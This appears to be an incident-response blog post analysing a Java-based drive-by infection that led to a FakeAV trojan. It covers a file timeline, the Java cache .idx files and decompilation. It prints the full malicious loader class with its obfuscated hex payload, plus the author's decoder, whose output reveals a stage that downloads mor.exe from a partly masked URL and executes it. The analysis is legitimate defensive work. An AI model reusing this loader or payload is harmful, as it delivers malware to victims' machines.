The reason why I posted Part 1 of this series was that this particular incident was very similar. It was only due to my experience in my previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.
Again I received an image of a machine and was notified that antivirus had detected the following file
Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n
I immediately noticed the similarity between this incident and my previous incident. I decided to start with the event logs again however in this instance I found one single entry and no tamper protection events as I had in Part 1
Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.
I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing I did not find any artifacts of interest. Due to my knowledge of the previous incident I decided to search for .idx files within the directory listing and I found the following
-A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed
-A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx
-A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0
-A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57
-A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245
-A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst
D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..
D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.
-A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties
-A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log
At this point I wasn't sure whether the following idx files were part of the incident but I decided, based on the previous incident, that they might be a good place to start.
74367697-78280468.idx
bffc1b9-44cf1245.idx
At this point the URLs discovered in these files definitely looked suspicious but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above
74367697-78280468
I exported the file listed above and uploaded it to virus total. Here are the results. Although there were only 3 hits that was enough for me to gather further suspicion of the files. I renamed the file and added the .jar extension and attempted to open this file with jd-gui. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file so I decided to move on and focus on one of the other files. If anybody has any advice on this file i'd be keen to hear what my next steps might be.
bffc1b9-44cf1245
Again I uploaded the file listed above to virus total to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui, SUCCESS! Here is the initial view I had when opening the file in jd-gui
I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus so I decided to spend my time focusing on 03. Below is what I reviewed when opening 03
import java.lang.reflect.Method;
import java.net.URL;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
class O3 extends ClassLoader
{
static ProtectionDomain pd;
public static char char_at(String paramString, int paramInt)
{
return paramString.charAt(paramInt);
}
public static Method get_func(Class paramClass) throws Exception
{
return paramClass.getClass().getMethod("newInstance", new Class[0]);
}
public static void invoke(Method paramMethod, Class paramClass) throws Exception
{
paramMethod.invoke(paramClass, new Object[0]);
}
public static String get_perm_name()
{
return new StringBuffer("setSec").toString() + "urityManager";
}
public static byte[] string_to_bytes(String paramString)
{
byte[] arrayOfByte = new byte[paramString.length() / 2];
try
{
Permissions localPermissions = new Permissions();
localPermissions.add(new RuntimePermission(get_perm_name()));
pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);
}
catch (Exception localException) {
}
int i = paramString.length();
for (int j = 0; j < i; j += 2)
{
int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);
k = (k - 3) % 256;
arrayOfByte[(j / 2)] = (byte)k;
}
return arrayOfByte;
}
public static void load(O3 paramO3)
{
try
{
int i = 1;
String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };
StringBuilder localStringBuilder = new StringBuilder();
for (int j = 0; j < arrayOfString.length; j++)
{
localStringBuilder.append(arrayOfString[j]);
}
byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());
Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);
invoke(get_func(localClass), localClass);
}
catch (Exception localException)
{
}
}
}
Basically from what I can gather from this Class file was that it creates an array of strings which i've highlighted in red. It then sends this array to the public static byte[] string_to_bytes(String paramString) method which attempts to deobfuscate the code. At this point I was pretty lost as I wanted to attempt to deobfuscate the string in hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.
I decided to create my own java application based on the application above. It would be a good chance for me to dust off some of my Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE which I was familar with.
I created the following Class based on the output of the above, again this is where I'm sure there are more efficient ways of doing this. My aim was to create a text file which listed the deobfuscated text within it. My class is as follows:
import java.lang.reflect.Method;
import java.io.*;
public class exploitMain {
/**
* @param args
*/
public static void main(String[] args) {
load();
}
public static char char_at(String paramString, int paramInt)
{
return paramString.charAt(paramInt);
}
public static byte[] string_to_bytes(String paramString)
{
byte[] arrayOfByte = new byte[paramString.length() / 2];
int i = paramString.length();
for (int j = 0; j < i; j += 2)
{
int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);
k = (k - 3) % 256;
arrayOfByte[(j / 2)] = (byte)k;
//System.out.println(k);
}
return arrayOfByte;
}
public static void load()
{
try
{
int i = 1;
String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };
StringBuilder localStringBuilder = new StringBuilder();
for (int j = 0; j < arrayOfString.length; j++)
{
localStringBuilder.append(arrayOfString[j]);
}
byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());
//System.out.println(arrayOfByte);
String temp = new String();
temp = bytesToStringUTFCustom(arrayOfByte);
writeToText(temp);
}
catch (Exception localException)
{
}
}
public static String bytesToStringUTFCustom(byte[] bytes) {
char[] buffer = new char[bytes.length];
for(int i=0;i < bytes.length;i++){
buffer[i]=(char)bytes[i];
}
return new String(buffer);
}
public static void writeToText(String output) throws IOException {
File file = new File("c:/output.txt");
BufferedWriter bo = new BufferedWriter(new FileWriter(file));
bo.write(output);
bo.close();
}
}
It was rushed so its fairly messy and I haven't commented on it. If you want to know anything further about it please feel free to leave some comments and I'll get back to you as soon as I can. Finally I reviewed my text file for further information.
???? 0 ~
' 2
3 4 5
6 7 8 9
6 : ; < =
> ?
@
A
B C D E
2 F
6 G
H I
J
@
K
L M
N O P Q R
S
T
T
U V
U W X Y Z [ <init> ()V Code LineNumberTable run ()Ljava/lang/Object;
Exceptions
SourceFile CL4.java ) * \ ] ^ 'java/security/PrivilegedActionException _ ` a http.keepalive false b c java/io/BufferedInputStream java/net/URL HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE d e f ) g h i ) j java/io/BufferedOutputStream java/io/FileOutputStream java/lang/StringBuffer TEMP k l m n /mor.exe o f ) p q r 00047 s t u 00116 00120 00074 v w x * y z { | } java/lang/Exception CL4 java/lang/Object 'java/security/PrivilegedExceptionAction java/security/AccessController doPrivileged =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object; java/lang/System setSecurityManager (Ljava/lang/SecurityManager;)V setProperty 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; java/lang/String trim ()Ljava/lang/String; (Ljava/lang/String;)V
openStream ()Ljava/io/InputStream; (Ljava/io/InputStream;)V getenv &(Ljava/lang/String;)Ljava/lang/String; append ,(Ljava/lang/String;)Ljava/lang/StringBuffer; toString (Ljava/io/OutputStream;I)V read ([BII)I java/lang/Integer parseInt (Ljava/lang/String;)I write ([BII)V close java/lang/Runtime
getRuntime ()Ljava/lang/Runtime; exec '(Ljava/lang/String;)Ljava/lang/Process; ! & ' ( ) * + > *? *? W? L? ,
- . + ? & ? ? L = > ? W? Y? Y
? ? ?
? : ? Y? Y? Y? ? ? ? ? ? ? : + ? Y=? ? `> 6 ? x d ` ? ? i d ` p? + \3 ? ??T? H d ` p ? + \3 ? ??T? , d ` p ? + \3 ? ??T? + \3 ? ??T? ??? + ? ??g ? ! ? "? #: ? Y? ? ? ? ? ? $W? L ? # % , n
. X g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? = > C # @ $ D / % 0 1
Its difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular it shows an additional file and the URL with the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for which unfortunately I did not find in this instance.
I hope you find this to be useful and hopefully some of you may comment on more efficient ways of doing what i've done above. Would love to gather any advice from anyone that does this on a more regular basis.
> Its difficult to make this output easy to read
ReplyDeleteWha-ha-ha, obviously, you got another class file as output. Lucky you, it had string constants defined as plain text.